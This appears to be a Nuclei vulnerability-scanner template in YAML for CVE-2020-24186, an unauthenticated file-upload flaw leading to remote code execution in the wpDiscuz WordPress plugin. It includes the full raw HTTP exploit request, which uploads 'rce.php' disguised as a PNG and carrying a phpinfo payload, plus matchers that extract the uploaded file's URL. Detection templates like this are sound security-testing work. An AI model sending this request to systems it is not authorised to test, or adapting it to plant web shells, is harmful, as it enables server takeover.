99 lines
3.4 KiB
YAML
99 lines
3.4 KiB
YAML
id: CVE-2020-24186
|
|
|
|
info:
|
|
name: WordPress wpDiscuz <=7.0.4 - Remote Code Execution
|
|
author: Ganofins
|
|
severity: critical
|
|
description: WordPress wpDiscuz plugin versions version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can lead to arbitrary code execution on the affected WordPress site.
|
|
remediation: |
|
|
Update the wpDiscuz plugin to the latest version (>=7.0.5) to mitigate this vulnerability.
|
|
reference:
|
|
- https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-24186
|
|
- https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
|
|
- http://packetstormsecurity.com/files/162983/WordPress-wpDiscuz-7.0.4-Shell-Upload.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2020-24186
|
|
cwe-id: CWE-434
|
|
epss-score: 0.97374
|
|
epss-percentile: 0.99893
|
|
cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: gvectors
|
|
product: wpdiscuz
|
|
framework: wordpress
|
|
tags: rce,fileupload,packetstorm,cve,cve2020,wordpress,wp-plugin,intrusive,gvectors
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /?p=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Origin: {{BaseURL}}
|
|
Referer: {{BaseURL}}
|
|
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="action"
|
|
|
|
wmuUploadFiles
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="wmu_nonce"
|
|
|
|
{{wmuSecurity}}
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="wmuAttachmentsData"
|
|
|
|
undefined
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php"
|
|
Content-Type: image/png
|
|
|
|
{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}
|
|
<?php phpinfo();?>
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak
|
|
Content-Disposition: form-data; name="postId"
|
|
|
|
1
|
|
------WebKitFormBoundary88AhjLimsDMHU1Ak--
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'success":true'
|
|
- 'fullname'
|
|
- 'shortname'
|
|
- 'url'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: wmuSecurity
|
|
group: 1
|
|
regex:
|
|
- 'wmuSecurity":"([a-z0-9]+)'
|
|
internal: true
|
|
part: body
|
|
|
|
- type: regex
|
|
group: 1
|
|
regex:
|
|
- '"url":"([a-z:\\/0-9-.]+)"'
|
|
part: body
|
|
# digest: 4b0a00483046022100bdd143584a6efd782ae28deeb8dd9169435a636d74426a655bc5c3762804514c0221008a062ba0f6be77b63fa1e85d870025f5c2cbfd1bbd98caabc9a3f407a46ce2bf:922c64590222798bb761d5b6d8e72950 |